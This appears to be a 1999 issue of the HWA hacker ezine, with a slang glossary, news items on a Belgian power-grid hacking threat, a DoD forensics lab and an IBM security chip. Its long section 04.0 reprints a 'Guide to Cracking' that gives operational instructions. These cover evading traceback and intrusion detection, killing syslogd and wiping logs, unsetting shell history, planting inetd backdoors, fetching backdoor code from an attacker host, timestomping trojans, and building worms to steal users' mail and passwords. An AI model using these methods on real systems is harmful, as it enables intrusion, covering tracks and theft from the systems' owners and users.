means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (No mail worthy of posting here this issue,) Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... ============================================================================== 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Forbidden Knowledge has released #7, our props to the FK crew and 2600ZA, * * SLa5H is back with news and views from .hr * * this issue is a little delayed as i'm getting used to a new keyboard, and * i've been sick with a bad cold...anyway the hardware... * natural style keyboard by Micro innovations, its a wicked awesome keyboard * but my typing speed has to adjust from the trashy standard keyboard I was * using. i've added a 17 Gig HD to the 10 Gig thats already in my main server * to go online at some point too and got myself some new cpu speakers ... * * Cruciphux */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 The Real ReDATtAck poised to Attack Belgium? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Zym0t1c, September, 28th 99 - A hacker who claims to be the real Redattack plans to shut down all the electricity in Belgium for about three hours tomorrow (29th). It'll take place from 1.30pm till 4.30pm. It'll last three hours because the generators of hospitals and the airport of Belgium can provide electricity for four hours and he doesn't want anyone getting killed. He claims to have hacked Electrabel (Belgian elektricity provider) and Belgacom (the biggest telephone company of Belgium (remember also ISP Skynet?)) He will also release some secret phone numbers of Belgacom clients and Proximus (cellular phone section of Belgacom) on the Internet (however no site was mentioned). Since the original ReDaTtAcK was more a mediawhore than a hacker (considered by the hacking ethic), this new Redattack took his name, so he claims... And if the government still doesn't take actions against crimes (?!!??) like these, he will shut down the whole country next week. We'll see... Is this a game of 'who's the best Belgian hacker?' I hope not, because real hackers sometimes suffer because of these (sorry) idiots. Also today - The original ReDaTtAcK claims to have hacked Planet Internet, also one of the biggest ISP's of Belgium. He could see some encrypted VISA-numbers and some client information. Planet Internet has increased their security. They press no charges against him. ReDaTtAcK also claims to have found an underground childporn network of a school in Belgium. He gave the information to the police of Gent, but they say his information was incomplete and maybe incorrect. Update ~~~~~~~ The original ReDaTtAcK wil be RA1 The second, so called 'real' Redattack will be RA2, okay? :) Sept, 29th 1999 - Belgium First of all, yesterday I wrote that RA1 claimed to have found an underground child porn network... Well, nothing of that is true, so say the authoroties. RA1 just acted as a little girl on a chatroom and drow the attention of a man. The man wanted to settle a little appointement between the two of them... Therefore, RA1 gave the information to the authoroties assuming he had found a network. The police says RA1 exaggerated, although there might follow an investigation... Second, RA2 mailed our newspapers yesterday saying he was impressed by the added security of Electrabel (Belgian electricity provider). He will not shut down the electricity but he will just try to break into the system and leave a logo or something. The IT-staff of Electrabel is rather relax about it. They claim their security system is unique, because they invented it, and it uses a system that practically no-one knows how to use, except the IT-staff of Electrabel of course. So, if he hacks the system, he first needs to learn using the system before he can actually do something... They are interested in the vulnerabilities of their system and hope that if RA2 succeeds, he will explain the holes found in their system. /** I've also heard of a few people that RA1 has offered his services to Electrabel to secure their system. I haven't read it or heard it on the radio, it's just what I've heard (maybe rumours), so I cannot prove it. Are they really playing a game of who's the best or who gets the most media attention? **/ The newspaper wrote also that they think RA2 was exaggerating about his skills. Two days ago he was so sure about hacking this computer and see what happens now: he pulls back. "When I cannot hack the system, I will make positive publicity about their security system.", says RA2. Jeezes man! :)) Third, Belgacom (biggest Belgian phone service provider) is pressing a charge against RA2. He claimed to kill all phonelines in Belgium and to publish secret phone and GSM numbers on the Internet. Well, there actually was a list with some phone numbers on the Internet, so people thought he really hacked Belgacom's system and copied the list. Guess what??? He published some phone and GSM numbers from Advalvas.com. The numbers were from people who registered for an emailadres and left their phone and GSM numbers... :) Because of the fact that RA2 threatened with criminal facts like killing the phone lines and publishing secret numbers, Belgacom pressed a charge against unknown people (referring to RA2, although they just know he's 22 and he's an IT'er). Since there has been a charge against him, the police could trace him. We'll see... I also added the newspaper article of the same newspaper 'De Standaard' and it's again in dutch! Sorry for this! :))) zym0t1c@ping.be HNN's Coverage; Belgium Electric Company Threatened by Cyber Intruder contributed by Maxim.Glory Belgian electricity provider Electrabel has been threatened by an an unknown assailant. The cyber intruder has threatened to turn off all power in the country sometime between 1:30 and 3:30 pm CET on Wednesday. According to an Electrabel spokesperson the system controlling Electrabel's distribution of power is custom made and the connections are therefore extra protected. (Oh yeah, security through obscurity, that always works.) Svenska Dagbladet - Swedish http://www.svd.se/paper.asp?menu=/dynamiskt/huvudmeny/did_276436.asp&main=/dynamiskt/senaste_nytt/did_277456.asp Excite News http://news.excite.com/news/r/990928/08/odd-hacker Electrabel http://www.electrabel.be/ Late Update 0830 contributed by Yaxmon Minutes after we went to press HNN learned that the attacker who goes by the name ReDaTtAcK 2, has withdrawn his threat and now says that he will not be turning off the power. (Of course now people will wonder if he ever could have and this person who did nothing more than make a phone call will forever be labeled as a 'hacker'. Thanks.) Reuters http://www.reuters.com/news/oddly_enough/ Excite; Hacker Threatens To Leave Country In The Dark Updated 8:10 AM ET September 28, 1999 BRUSSELS (Reuters) - A computer hacker has threatened to break into the computers of Belgian electricity generator Electrabel Wednesday afternoon and halt the power supply to the entire country. "Tomorrow I will leave Belgium without power, and that is not so difficult," the anonymous hacker told the Belgian newspaper Het Laatste Nieuws. "Wednesday I will get into Electrabel's computers between 1:30 and 3:30 in the afternoon and shut down all the electricity," the hacker said. Electrabel, which has a virtual monopoly on Belgium's electricity market, said it was taking the threat seriously but felt that the hacker had little chance of succeeding. "There is very little chance that Belgium could be without power," Electrabel spokesman Phillipe Massart told RTBF television. "Nonetheless, the risk that someone could access the system always exists." Massart said the systems that pilot Electrabel's power distribution were developed specifically for the company and have protected connections. He said the company was taking measures to ensure its security. Hacker Changes Mind About Switching Off Country Updated 9:55 AM ET September 29, 1999 BRUSSELS (Reuters) - A computer hacker has backed down from a threat to break into the computers of Belgian electricity generator Electrabel Wednesday afternoon and cut the nation's power supply, Electrabel said. The hacker, who calls himself ReDaTtAcK 2, phoned Electrabel, which has a virtual monopoly on Belgium's electricity market, to withdraw the threat. "I had this guy on the phone," spokesman Patrick De Vos told Reuters. "He withdrew his threat. It's a non-event." The hacker launched a crusade earlier in the summer, attacking Web sites in an attempt to alert Belgium to the security risks of the Internet. De Vos said the hacker had threatened to break into Electrabel's computers to prove the system's vulnerability. "He would like to try and find a hole and insert his business card and say this is a failure in the system," De Vos said. He said the company had taken the threat seriously but did not believe its system had ever been at risk. @HWA 04.0 FAQ and Guide to Cracking by Mixter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://blacksun.box.sk/ -----BEGIN PGP SIGNED MESSAGE----- FAQ and Guide to Cracking (c) 1999 by Mixter Disclaimer: This is a theoretical instruction to cracking and for informational purposes. It should be seen as an introduction to the methods and strategies used by crackers rather than a howto. The author is not suggesting to perform illegal actions and cannot be held liable for any actions of other individuals who perform any of the actions discussed in this paper and possible resulting damage. Introduction: I am going to describe the methods and strategies used to access various UNIX hosts among the internet unauthorizedly. This guide will not teach you how to hack, neither do you have to be a hacker to use the techniques described here. Hacking means finding your own way to do it, and finding new approaches to accomplishing something. I am only going to supply you with one possible approach to cracking. I. Prerequisites Operating System: You certainly need Unix installed on your home computer. WINDOWS WILL NOT DO IT. I'm not going into details here, but you should take either Net/Open/FreeBSD or Linux because they are POSIX compliant, suitable for Home PC's and most small network tools will compile on them. If you use Linux [1], you should not use the RedHat, SuSE, or Slackware distributions unless you know how to secure them properly. Local root compromise can be fatal as you may reveal your identity. Basic Knowledge: Get experienced in the use with the following tools. Use the 'man' command, and work with them until you fully understand them. These tools are: awk cat chmod dd grep gzip kill ln ls mail mknod more mount ping ps sed sort tar ifconfig ipfwadm last head tail gcc cut find ftp less vim nc (netcat) rcp xhost xterm syslogd inetd telnet ssh finger Security requirements: You need to make sure that no one can compromise your own host. Check security sites to make sure your daemons (servers) are not exploitable. Do not allow anyone to use your box. Disable telnet, rlogin, and whatever you don't need yourself. Ideally, you do not run any servers at all while you are attacking other hosts. Consider encrypting directories and/or complete partitions with encrypted file systems and encrypt emails and files you transfer with PGP. [2] Account: For your activities, you require an ISP account with a direct connection, which normally all ISP provide. You might want to consider not doing any 'cracking' activities from your home at all, in which case you need a fast linux or bsd shell account, which must not be from a commercial shell provider (esp. those who sell eggdrop and irc accounts), and if you use a university account, you need to make sure that they do not watch / monitor their users. If you use a dialup, ensure yourself that no transparent proxies or network monitors (squid etc.) are being run by your provider. Do a traceroute and check your providers backbone routers for NIDS (Intrusion Detection), network monitors, proxies, and anything that seems unusual; alternatively let someone with more knowledge do it. II. Scanning Avoiding track-downs: Where you scan from is up yours. Whatever you do, don't scan from your dialup while using a legit internet account. Everyone knowing your IP is a phone call to your provider away from knowing your identity. If you use fake accounts, avoid using fake or stolen credit cards to make them. Also avoid using 1-800 numbers at all costs, because the 1-800 nodes generally log every calling phone number with access time. Inquire about the ISP you use to make sure he is not in explicit cooperation with federal agencies. Additionally, do not stay longer than 5 (in words: five) hours on the internet without hanging up and reconnecting. Why? If you are logged on, the node has your account associated with your current dynamic IP address for obvious technical reasons, and they also might be able to trace you. Most nodes will not keep a table of which IP belongs to which account once they disconnected, especially on huge ISP where this would take large additional resources. I disrecommend traversing through WinGate and SOCKS servers, because they give you a fake feeling of safety. Often, these servers are logging every access and sometimes they are put up by federal agencies itself. You should ideally relay your connections through a server you have root, hence full control, on, using datapipe, bnc, ssl, or a wingate/socks server with logging completely disabled. Stealthy scanning: A scan not being noticed is a successful scan. Half-Open (SYN) scans are lame, because many daemons will still report a "warning: can't get client address: Connection reset by peer" or similar message, then have someone turn on a sniffer or tcplogd and they see who is scanning them. Advanced and recommended scans are NUL (tcp packet without any flags), XMAS (ack/syn/rst probe), and Maimon scans, which can be done with nmap [3]. If you use connect() scans, which are much more reliable, then use lscan, and get the version info. This generally makes the most sense because you have to get the daemon's versions anyway to see if it is exploitable. Play dead: As you scan, I strongly recommend disabling every single service on the machine you're scanning from and setting packet filtering rules. This will fool the hosts being scanned into thinking your host is down and the scan is spoofed. A few things you should disable: * Inetd ( identd, finger, ftp, telnet ) * All INCOMING tcp connection requests (ipfwadm: -y flag) * ICMP Timestamping, Echo reply, Query (ICMP types 8/13/15/17) * UDP Traceroute queries (udp port range 33400-33500) Also note that -deny is better than -reject, which would send an ICMP unreach packet back instead of keeping totally silent. Non-sequential scanning: This is important: Use non-sequential scanning to avoid intrusion detection systems. An IDS or NIDS is installed on a gateway or router and monitors unusual traffic to certain ports. If you scan 1.1.1.1, 1.1.1.2 .. 1.1.1.255, 1.1.2.1 etc., an intrusion detection system can detect your scan against 1.1.1.*. Instead, scan like this: 1.1.1.1, 1.1.2.1 .. 1.1.255.1, 1.1.1.2 You get the point. What to scan: Most crackers resolve a top-level domain like .com .net or a country like .ee .se .ch etc. using z0ne or axfr from ADM [4], or by using a simple recursive shell script. host -l domain will not do for a scan, because you'll miss all the subnets that way, and there are plenty of them. However, I'd rather suggest scanning complete IP blocks. Depending on your greed, you can either scan a class B (1.1.*.*) or class A (1.*.*.*) network. You might wish to obtain some information about your targets first. To do this, you can query whois.arin.net, the registration center for IP addresses. Lets say you want to scan 192.168.*.* and you want to know who owns that IP block. Type: whois -h whois.arin.net 192.168.0.0 or whois 192.168.0.0@whois.arin.net and you get a short description of the owners of that netblock. If arin.net doesn't find any information, don't scan it, because the IPs are probably not yet in use. Some info on the 'whois' results... Maintained by RIPE.NET = European (no, uk, ch, at, de, se, dk, etc.) Maintained by APNIC.NET = Asian (id, kr, za, ee, tr, li, kh, etc.) Maintained by NIC.xxx = Belonging to country xxx Finding vulnerable hosts: First rule of scanning is: never delete your scan logs. If you think you are completely done with evaluating your logs, then compress, encrypt and store them, dont delete them. New security vulnerabilities will be found sooner or later, then you won't have to scan it all again. From my experience, the vulnerability scanners are almost all bullshit, you dont need them. Use grep and awk to extract the IP numbers from your scan logs, like this... grep "QPOP" port110.log | grep "(version 2.2)" | awk '{print $1}' > 0wn.txt (presuming that your scanner logs like this: " - ") There are a couple of cases where you need an additional scan to find vulnerable versions, which are: Buggy Daemon Scanner Scans for... wu-ftp BETA-18 wuftpscan/ben (private) Writable dir portmap rpcinfo -p (unix tool) Portmap Version ttdbserver rpcinfo ttdb version rstatd statdscan rstatd version mountd mountdscan (rootshell) mountd/nfs version bind binfo-udp (rootshell), bind version nscan (my site), mbind (private) III. Rooting Lets think about the first commands you issue. They should: 1. Discretely remove traces of the root compromise 2. Gather some general info about the system 3. Make sure you can get back in 4. Disable or patch the vulnerable daemon(s) Here are my suggestions... 1. killall -9 syslogd klogd - pesky loggers! only few admins will notice if they get turned off. Now you can act freely. copy secure.1 and messages.1 from /var/log over secure and messages Normally, these logs are the only ones with the intruders IP and traces of a root compromise in them. If *.1 doesn't exist, truncate the files. Also, unset HISTFILE is important. Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or even /. Very unprofessional :). 2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf... Inform yourself about the frequency the system is being maintained, administrated, if the logfiles are being analyzed. * Look how many people have access to it (/etc/passwd) - the more the better for you (keeps attention away from you). * Look if the system is already backdoored!! you might want to remove other backdoors. * Look for a loghost or snmp (dangerous because you cant manipulate the logs on a far-away loghost). Watch out for *logd, sniffers, netmon's etc before you do anything great on the host. If you are paranoid, traceroute the host, and see if non-routers are before that host (probably IDS, loghost, sniffer, etc). 3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH! It is too easy to detect you if you add yourself to /etc/passwd, or open a port by manipulating inetd.conf. Let me tell you that root kits and /bin/login trojans are the first things any sane admin will watch for. Install a nice stealthy port backdoor. My approach to uploading files is doing: (on your box) $ uuencode -m backdoor.c backdoor.c | less (on the target box) uudecode # cc -o backdoor backdoor.c A nice different method is putting a daemon on your own box, on port 666, that spits out the source code when someone telnets to it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c As I said, make sure you can get back in. If the box you rooted has an uptime of more than 300 days or so, you might consider not installing the backdoor for startup. Instead, kill the vulnerable daemon, and when the host restarts, come back using an exploit. Normally, you can replace a lame daemon that nobody uses with your backdoor. Look at inetd.conf to see what daemons are active. A safe bet is in.talkd which often is activated but seldom ever used. So, when you want to re-activate your backdoor, talk root@0wned.host.com for a second, and your backdoor is running. You can also add /path/to/backdoor to /root/.profile.. but it is a bit riskier than the inetd backdoor method. 4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what you need to do to patch your buggy stuff. If RPM is installed you can try a rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm If not, use ncftp to fetch the file anonymously, because it doesn't need user interaction. If you want, add an additional backdoor in your "patched" server. QPOP 2.53 even supports this itself. For all files you replace, you should modify the time stamps, which wont help, if the admin uses tripwire or cksum, but if the admin is, like most admins, a complete lamer that does find / -ctime to scan for trojans and thinks he knows his job. :P To modify timestamps, you do a simple: touch -r /bin/bash /path/to/your/trojan this will copy the exact date/time info from /bin/bash over your freshly added trojan. Voila! The alternative to all this for lazy people is, to add a ipfwadm rule that prevents traffic from the outside (-W eth0) to the ports with the buggy daemons, and adding that command to a rc.d script as well. Bind doesn't need tcp port 53 for anything except zone transfers and the RoTShB/ADM bind exploits. It works fine with 53/tcp firewalled. But be aware that this might get you detected, lets say if you disable port 110 or 143 on an ISP's central mail exchange server... About your backdoor: Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or even something as unusual as raw IP is very useful. People that bind /bin/sh to a port are idiots, because they open that host to everyone, letting in sniffers, and probably other people who may damage the host seriously. Make sure to password protect everything that runs as root. A password of a minimum length of 8 characters, because you have no way of detecting a brute force attack. For the C programmers, let me say, listen(sockfd,1). Maybe 2 connections, but not more. For comfortability, you can add some stuff you want to occur on each successful backdoor login, like system("w"), system("killall -9 syslogd klogd"), or whatever. If you want a front-end backdoor with some integrated functions, try gateway[5]. IV. UTILIZING COMPROMISED SYSTEMS About your activities: Do what you desire, but never without disregarding stealthiness. If you stop checking log files, processes, or start something like ping -s 1024 -f cert.org un-stealthed, it is, depending on the admin, a matter of hours or days until you lose the host. Most of the time, losing a host means you cannot get access again, and the admins will examine their system with extreme scrutiny; if they are too lame, they might contact some external security experts or even the Computer Emergency Response Team. Never do serious damage to the system, when you don't have to - and trust me, you won't. Damaging a system by altering vital system files, replacing frequently-used programs or even destroying information is unintelligent, will not do you any good, and will maybe assist you in getting new enemies. And it is trivial to mention not to deface web sites... World domination: As the number of systems you control increases, you might want some kind of easy remote control, utilization for attacks, and detection of detection of your activities. You can install newnick bots or eggdrop bots with fancy scripts which can be controlled through IRC to make life easier (make sure to sit and think before you consider doing anything big with them on IRC!). You can make your own inter-linked network of root systems, in which case you need to start programming because no one will release such a program to the public. :) You can make a little packages with spoofing flooders, smurf and the like, if you decide becoming a packet warrior (then again, it won't help you accomplishing anything but getting irc channels or shutting down government sites...). Alternatively, you can use every root you get to scan new netblocks, and have the information mailed to you or whatever. You can make an internet worm like ADMw0rm [4], B4b0w0rm, millennium worm (the last 2 are private), and install them on your roots; make sure it is well constructed and bug-free... If you are a creative person, you can make them scan large amounts of ISP dialup netblocks for back orifice, netbus server, backdoor G, and what not, and write something that controls their computers to spread more trojans, send their mail to you, get their passwords, flood, scan, invade their private lives... no wait, that's the governments job. V. YOUR PRESENCE ON THE NET Smart behavior and senseless behavior: What you do besides cracking, mostly happens on IRC. IRC should be seen as a tool for getting in touch with other skilled persons and exchanging thoughts and information. To avoid wasting your time, skills, and possibly getting busted, here are some things which you SERIOUSLY should not be doing: 1) Warez. Stay away from warez, it is a waste of time. Warez ruins productive people and makes software expensive. Besides the moral bullshit, you can always get something you really need (#1 net game, enterprise application etc.), and you don't need much, trust me. Almost everything security / hacking related is free. Joining a warez group gets you a) alot of vhosts with lame names b) idiotic friends c) on the FBI blacklist - nothing besides that. 2) 'IRC War'. Groups like core, chrome, enforce, conflict, takeover, madcrew, phorce, tnt, etc. etc. who call themselves 'War' groups, are good for nothing. Why would you want to be a member of a group that attacks other similar groups and channels - it is comparable to the mafia - almost as violent, dangerous, except that you don't get rich. If you think you need 'WarGroup' support for taking a channel with reasonable security, you are lame or you can't take a challenge. Think again. 3) Hacking related groups. Inform yourself about what happened to gH or 'global Hell'. Most of these groups do the exact opposite of what is advised in this paper. If you get an offer to join: l0pht, cDc, MOD, thc, or ADM, take it because you'll learn a lot, all other groups are not worth your time. 4) IRC operators, BOFH, admin of big systems. Stay away from them until you are confidently prepared and willing to fight with them. Blindly attacking them can also be a waste of time, but it can also become a reasonable challenge. Keep up to date: The more you advance in cracking skills, or even might consider hacking, programming or developing, the web probably gets the part of the web you use least. Visit your favorite security related sites frequently, and make sure to keep up to date about security breaches, law enforcement, exploits, changes in the methods of crackers and admins. My bookmarks certainly include Packetstorm security [6] and GeekGirl [7]. URLS: [1] ftp://ftp.cdrom.com/pub/linux/distributions [2] http://members.xoom.com/i0wnu/pgp.html [3] http://www.nmap.org [4] ftp://ftp.adm.isp.at/pub/ADM [5] http://members.xoom.com/i0wnu/gateway.tgz [6] http://www.genocide2600.com/~tattooman [7] http://www.geek-girl.com -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBN2VcO7dkBvUb0vPhAQGtPgf+Iglo6ZZh7sF/WbeteyTGYaw0D9AJR4IH A7hBo9AUwm3ZO7gDhdzLvDlOjXiMxhhJ2Jey/Y6M5Bb5LvZf8tK4EoUIF/UA8ifU E6fd18zBDJep2LFaHyzXegA5oCWCYjpb3ZcFtbtpcA2He1hU85QUknOAHZ6lJyiV JJZziWnXRkAcmRpzbLkTgVydisgugNwfYs9OJH/GNMCKQzeKB+MJrQ7wNlNOdV6T 7u4Jt1q1hW7P5p3xi6ETS196qQ7NO+46FqTEShk6HC+wl7EDwv8VTbz5lEGjBVXz JEiIIAM5YfbGRbu65fTIlhI0u5N8OxKkX74HOGcBsInQlzuCNq6aMA== =o8mY -----END PGP SIGNATURE----- @HWA 05.0 DOD Launches Computer Crime Lab ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by x-empt The Department of Defense unveiled the newest high-tech crime laboratory last Friday. Technology within the lab supposedly has the ability to "trace hackers across the Internet", break encryption and rebuild cut up floppy diskettes. The new Defense Computer Forensics Lab located near Baltimore MD, (very close to NSA Headquarters) will be staffed by a team of 80 personnel to help investigate espionage, murder and other crimes, as well as training other investigators. San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/ap/docs/890127l.htm Posted at 3:21 p.m. PDT Friday, September 24, 1999 High-tech crime-fight Lab unveiled BY TED BRIDIS Associated Press Writer LINTHICUM, Md. (AP) -- The Defense Department showed off its latest arsenal of high-tech crime-fighting tools Friday, a $15 million computer lab where it can trace hackers across the Internet, unscramble hidden files and rebuild smashed floppy disks that were cut in pieces. Investigators will use the new Defense Computer Forensics Lab, located in a nondescript brick building south of Baltimore, to unravel electronic evidence in cases of espionage, murder and other crimes involving America's military. Using powerful computers and special software, these 80 digital detectives can trace a hacker across the Internet to his keyboard, recover files thought to be safely deleted and quickly search tens of thousands of documents for an important phrase. Cyberspace is ``a new kind of wild, lawless sort of frontier,'' said Christopher Mellon, a deputy assistant Defense secretary. ``We have important national interests, and we have to be able to function.'' Organizers envision sharing equipment and secret techniques they develop to help FBI, state and local authorities prosecute criminals who use computers, such as drug-dealers who track profits and customers with accounting software. The FBI even established its own minilab upstairs in the building, though most of its digital forensics work will continue to be performed in downtown Washington at its headquarters. ``Virtually every white-collar crime case today brings at least one computer, if not a whole network of computers,'' FBI Assistant Director Donald Kerr said. ``We need people who are well prepared.'' David Ferguson, the lab's director, showed how experts can use these high-tech tools to enhance garbled audio recordings -- even digitally mute one voice in a conversation to listen to another -- and recover computer files from disks and tapes even if they had been deleted. The lab can dissect virtually any type of computer, from handheld devices to Apple computers to those using Windows or even specialized software. It's developing a way to analyze all machines using a powerful assembly of computers working together, called a ``Beowulf cluster,'' technology also used by NASA and some Energy Department researchers. One lab worker, David Lang, demonstrated how investigators can reassemble and read from a computer's floppy disk that a criminal trying to hide evidence might cut into pieces and crumple. The procedure, developed a decade ago but still being perfected, takes ``a day if you're lucky, to a month if it's something you haven't encountered before,'' Lang said. ``It's basically just a jigsaw puzzle to be put back together.'' Ferguson expects to handle about 400 cases each year from all the military branches, mostly crimes where a computer might have played part in espionage, deaths or sexual assaults. About 10 percent of cases involve tracing hackers snooping through military computers. The new program also trains investigators, who will be assigned full time to military posts and bases worldwide. Typical classes are three weeks of about a dozen students learning about espionage, hackers, networks and special computer hardware. ``What we intend to handle here is the big and large,'' Ferguson said, citing examples where huge amounts of data need to be analyzed or where a particularly savvy criminal scrambled his digital records and won't give up his password. Although Ferguson and others declined to discuss specific cases already under way, they described as rare those involving encrypted files. The White House agreed last week to allow sale of the most powerful data-scrambling technology with virtually no restrictions, although military and law enforcement officials have long warned that criminals and terrorists might also use the technology. Ferguson said he was confident that techniques to break those messages will be adequate once Congress approves a proposal by the Clinton administration to give the FBI $80 million over four years for the technology. Defense Department officials also acknowledged that the lab's proximity to the nearby National Security Agency, the government's premier code-breaking organization, was a primary factor in deciding its location. @HWA 06.0 IBM to Launch Security Chip ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Code Kid IBM will unveil today a chip that will include features such as key encryption and digital signatures. The PC 300PL will be the first IBM computer to include the security chip. (Hmmm, Not a whole lot of information here. Can anyone find a link to a data sheet or even the name of this chip? Will this thing digitally 'sign' everything? Will the user be able to turn it off?) PC World http://www.pcworld.com/pcwtoday/article/0,1510,12997,00.html?cp=reuters IBM Looks to Lock Down PC Security Big Blue hopes its security chip will become a standard. by Reuters September 27, 1999, 8:23 a.m. PT IBM plans to launch on Tuesday a security system that it hopes will set the industry standard for protecting confidential documents, such as those used in the growing area of electronic commerce. Unlike previous security measures that rely on software "firewalls" that filter out unauthorized users of information, IBM has developed a security chip embedded within the computer hardware, which, it says, adds additional levels of security. "People from outside [of your organization] can get at your software," says Anne Gardner, general manager of desktop systems for IBM. "People from the outside can't get to your hardware." The first IBM computer to include the security chip will be the PC 300PL. The company plans to eventually include the security features in all of its products. The chip will come installed in the hardware with no additional cost to the customer, Gardner says. The features of the security chip include key encryption, which encodes text messages, and "digital signatures," which act as unique "watermarks" that identify the sender of the document. Share and Share Alike "We want this to become an industry standard," IBM's Gardner says. "We want this on as many desktops as possible." Asked if IBM would share the technology with competing hardware makers, she says, "You may see something along those lines in the future." She declines to be more specific. "It's a good strategy not to try to clutch this technology and try to make money," says Roger Kay, an analyst at International Data Corporation. "It's a good strategy to give it away and try to get as many people to go for it as possible. IBM doesn't want this to be proprietary. They want it to be ubiquitous." Kay calls the development "a good first step" 